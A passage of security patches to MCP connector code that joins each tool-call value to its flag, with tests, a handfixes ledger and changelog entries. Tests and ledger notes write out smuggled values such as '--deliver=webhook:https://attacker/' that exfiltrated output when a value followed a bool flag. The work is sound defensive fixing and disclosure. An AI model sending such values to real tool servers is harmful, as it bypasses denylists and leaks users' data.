+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Fixed

--- a/skills/immybot/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/immybot/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/immybot/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/immybot/cli/internal/mcp/cobratree/shellout.go
@@ -348,6 +348,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -357,10 +364,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -368,11 +375,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/immybot/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/immybot/cli/internal/mcp/cobratree/shellout_test.go
@@ -98,7 +98,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"receipt-file": true,
 		"token":        true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -127,7 +127,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -192,7 +192,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"json":    "true",
 		"output":  "/tmp/evil.json",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -410,7 +410,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -932,4 +932,113 @@ func toolResultContentText(result *mcplib.CallToolResult, index int) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/immybot/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/immybot/cli/internal/mcp/cobratree/shellout_test.go
@@ -993,15 +993,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/immybot/cli/internal/mcp/intents.go
+++ b/skills/immybot/cli/internal/mcp/intents.go
@@ -54,6 +54,9 @@ func handleExplainAMissedDeployment(ctx context.Context, req mcplib.CallToolRequ
 	args := []string{}
 	args = append(args, "assignment-explain")
 	var missingId bool
+	if err := rejectFlagLikeRecipeValue("id", input["id"]); err != nil {
+		return mcplib.NewToolResultError(err.Error()), nil
+	}
 	args, missingId = appendRecipePositional(args, input["id"], true)
 	if missingId {
 		return mcplib.NewToolResultError("id is required"), nil
@@ -77,6 +80,9 @@ func handleCheckReachBeforeEditingASharedScript(ctx context.Context, req mcplib.
 	args := []string{}
 	args = append(args, "script-blast-radius")
 	var missingId bool
+	if err := rejectFlagLikeRecipeValue("id", input["id"]); err != nil {
+		return mcplib.NewToolResultError(err.Error()), nil
+	}
 	args, missingId = appendRecipePositional(args, input["id"], true)
 	if missingId {
 		return mcplib.NewToolResultError("id is required"), nil
@@ -115,10 +121,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {
@@ -149,4 +155,17 @@ func recipeValueString(value any) string {
 		}
 		return fmt.Sprintf("%v", value)
 	}
+}
+
+// rejectFlagLikeRecipeValue is hand-wired (handfixes.json:
+// mcp-recipe-argv-not-flag-like). A recipe positional comes straight from the
+// tool call and lands in argv ahead of the recipe's own flags, so a value
+// beginning with "-" would be parsed by pflag as a flag - the same key-only
+// gap mcp-argv-value-joined closes for cliArgsFromMCP. Mirrors the rule in
+// cobratree.validatePositionalArgsForMCP.
+func rejectFlagLikeRecipeValue(name string, value any) error {
+	if s := recipeValueString(value); s != "-" && strings.HasPrefix(s, "-") {
+		return fmt.Errorf("flag-like value %q not allowed for %s; pass a plain value", s, name)
+	}
+	return nil
 }

--- a/skills/immybot/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/immybot/cli/internal/mcp/recipe_intents_test.go
@@ -100,3 +100,61 @@ func recipeToolText(t *testing.T, result *mcplib.CallToolResult) string {
 	}
 	return text.Text
 }
+
+// TestRecipeIntentExplainAMissedDeploymentRejectsFlagLikePositional guards the hand-fix
+// mcp-recipe-argv-not-flag-like: a positional value that begins with "-"
+// would land in argv ahead of the recipe's own flags and be parsed by pflag
+// as a flag, so it must be refused before the CLI runs.
+func TestRecipeIntentExplainAMissedDeploymentRejectsFlagLikePositional(t *testing.T) {
+	oldPath, oldErr := recipeCLIPath, recipeCLIPathErr
+	t.Cleanup(func() {
+		recipeCLIPath, recipeCLIPathErr = oldPath, oldErr
+	})
+	recipeCLIPath = writeRecipeIntentRecorder(t)
+	recipeCLIPathErr = nil
+
+	for _, bad := range []string{"--deliver=webhook:https://x/", "--dry-run", "-x"} {
+		req := mcplib.CallToolRequest{Params: mcplib.CallToolParams{Arguments: map[string]any{
+			"id": bad,
+		}}}
+		result, err := handleExplainAMissedDeployment(context.Background(), req)
+		if err != nil {
+			t.Fatalf("handler returned transport error: %v", err)
+		}
+		if !result.IsError {
+			t.Fatalf("flag-like id %q reached the CLI: %s", bad, recipeToolText(t, result))
+		}
+		if got := recipeToolText(t, result); !strings.Contains(got, "flag-like") {
+			t.Fatalf("unexpected error for flag-like id %q: %s", bad, got)
+		}
+	}
+}
+
+// TestRecipeIntentCheckReachBeforeEditingASharedScriptRejectsFlagLikePositional guards the hand-fix
+// mcp-recipe-argv-not-flag-like: a positional value that begins with "-"
+// would land in argv ahead of the recipe's own flags and be parsed by pflag
+// as a flag, so it must be refused before the CLI runs.
+func TestRecipeIntentCheckReachBeforeEditingASharedScriptRejectsFlagLikePositional(t *testing.T) {
+	oldPath, oldErr := recipeCLIPath, recipeCLIPathErr
+	t.Cleanup(func() {
+		recipeCLIPath, recipeCLIPathErr = oldPath, oldErr
+	})
+	recipeCLIPath = writeRecipeIntentRecorder(t)
+	recipeCLIPathErr = nil
+
+	for _, bad := range []string{"--deliver=webhook:https://x/", "--dry-run", "-x"} {
+		req := mcplib.CallToolRequest{Params: mcplib.CallToolParams{Arguments: map[string]any{
+			"id": bad,
+		}}}
+		result, err := handleCheckReachBeforeEditingASharedScript(context.Background(), req)
+		if err != nil {
+			t.Fatalf("handler returned transport error: %v", err)
+		}
+		if !result.IsError {
+			t.Fatalf("flag-like id %q reached the CLI: %s", bad, recipeToolText(t, result))
+		}
+		if got := recipeToolText(t, result); !strings.Contains(got, "flag-like") {
+			t.Fatalf("unexpected error for flag-like id %q: %s", bad, got)
+		}
+	}
+}

--- a/skills/immybot/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/immybot/cli/internal/mcp/recipe_intents_test.go
@@ -158,3 +158,20 @@ func TestRecipeIntentCheckReachBeforeEditingASharedScriptRejectsFlagLikePosition
 		}
 	}
 }
+
+// TestRejectFlagLikeRecipeValueEdges pins the normalized rule of the hand-fix
+// mcp-recipe-argv-not-flag-like: leading whitespace is trimmed before the
+// check, the bare "-" is allowed, and a negative number is refused like any
+// other leading dash.
+func TestRejectFlagLikeRecipeValueEdges(t *testing.T) {
+	for _, bad := range []any{" --deliver=webhook:https://x/", "\t--dry-run", "  -x", "-5", float64(-5), "--"} {
+		if err := rejectFlagLikeRecipeValue("v", bad); err == nil {
+			t.Fatalf("flag-like value %#v was accepted", bad)
+		}
+	}
+	for _, ok := range []any{"-", "plain", " plain-value ", "a=b", float64(5), nil, ""} {
+		if err := rejectFlagLikeRecipeValue("v", ok); err != nil {
+			t.Fatalf("plain value %#v was refused: %v", ok, err)
+		}
+	}
+}

--- a/skills/immybot/handfixes.json
+++ b/skills/immybot/handfixes.json
@@ -578,8 +578,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -589,7 +601,50 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "func rejectFlagLikeRecipeValue(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "if err := rejectFlagLikeRecipeValue(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/recipe_intents_test.go",
+     "contains": "RejectsFlagLikePositional(",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/immybot/handfixes.json
+++ b/skills/immybot/handfixes.json
@@ -563,6 +563,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/immybot/handfixes.json
+++ b/skills/immybot/handfixes.json
@@ -614,7 +614,7 @@
   },
   {
    "id": "mcp-recipe-argv-not-flag-like",
-   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs. (2 guarded call site(s); the ledger requires all of them.)",
    "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
    "status": "active",
    "asserts": [
@@ -637,12 +637,24 @@
     {
      "file": "cli/internal/mcp/intents.go",
      "contains": "if err := rejectFlagLikeRecipeValue(",
-     "min_count": 1,
+     "min_count": 2,
      "code_only": true
     },
     {
      "file": "cli/internal/mcp/recipe_intents_test.go",
      "contains": "RejectsFlagLikePositional(",
+     "min_count": 2,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "if s := recipeValueString(value); s != \"-\" && strings.HasPrefix(s, \"-\") {",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/recipe_intents_test.go",
+     "contains": "func TestRejectFlagLikeRecipeValueEdges(",
      "min_count": 1,
      "code_only": true
     }

--- a/skills/itglue/CHANGELOG.md
+++ b/skills/itglue/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/itglue/CHANGELOG.md
+++ b/skills/itglue/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/itglue/CHANGELOG.md
+++ b/skills/itglue/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/itglue/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/itglue/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/itglue/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/itglue/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/itglue/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/itglue/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/itglue/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/itglue/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
